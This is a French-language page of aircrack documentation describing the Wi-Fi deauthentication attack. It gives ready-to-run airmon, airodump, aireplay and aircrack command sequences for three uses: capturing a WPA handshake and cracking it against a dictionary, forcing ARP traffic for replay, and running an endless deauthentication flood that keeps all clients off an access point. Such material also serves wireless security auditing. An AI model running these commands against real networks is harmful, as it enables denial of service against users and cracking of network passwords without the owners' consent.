Traduction française, original view it in english
Voir le tutorial

Documentation de aircrack

retour a l'index de la doc

Attack 0: deauthentication
Attaque par desauthentification

Cette attaque est extremement utile pour retrouver un ESSDI caché (not broadcasted) et pour la capture de handshakes WPA en forçant le client à se réauthentifier. On peut aussi s'en servir pour générer des requetes ARP car les clients Windows vident parfois leur cache ARP quand ils sont déconnectés. Biensur cette attaque est totalement inutile si il n'y a pas de client wifi associés.

Dans les exemples suivant , 00:13:10:30:24:9C est l'adresse MAC du point d'acces (sur le canal 6), et 00:09:5B:EB:C5:2B est l'adresse MAC d'un client (connecté en wifi).

Il peut etre utile de cibler une station spécifique en utilisant le paraètre -c.

Exemples:

@ MAC de l'AP (canal 6):00:13:10:30:24:9C
@ MAc du client wifi: 00:09:5B:EB:C5:2B

  • Capture d'Handshake WPA avec une Atheros

    airmon.sh start ath0
    airodump ath0 out 6  (basculez dans une autre console)
    aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
    (attendez quelques secondes)
    aircrack -w /path/to/dictionary out.cap

  • Demande de génération d'ARP avec une carte Prism2

    airmon.sh start wlan0
    airodump wlan0 out 6  (basculez dans une autre console)
    aireplay -0 10 -a 00:13:10:30:24:9C wlan0
    aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
        

    Apres avoir envoyer les 5 series de paquets de desauthentification, on commence à capturer les requetes ARP avec l'attaque 3. L'option -h est obligatoire et doit être l'adresse MAC d'un client associé.

    Si le pilote est wlan-ng, vous devez lancer le script airmon.sh ; sinon la carte ne sera pas correctement configurée pour l'injection.

  • Denis de service en masse avec une carte RT2500

    airmon.sh start ra0
    aireplay -0 0 -a 00:13:10:30:24:9C ra0

    Avec le parametre 0, cette attaque va recommencer indefiniement à envoyer des paquets de desauthentification à l'adresse d'emission, empechant ainsi aux clients de rester connectés.


© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier nÝ 1142196
Rc v2.0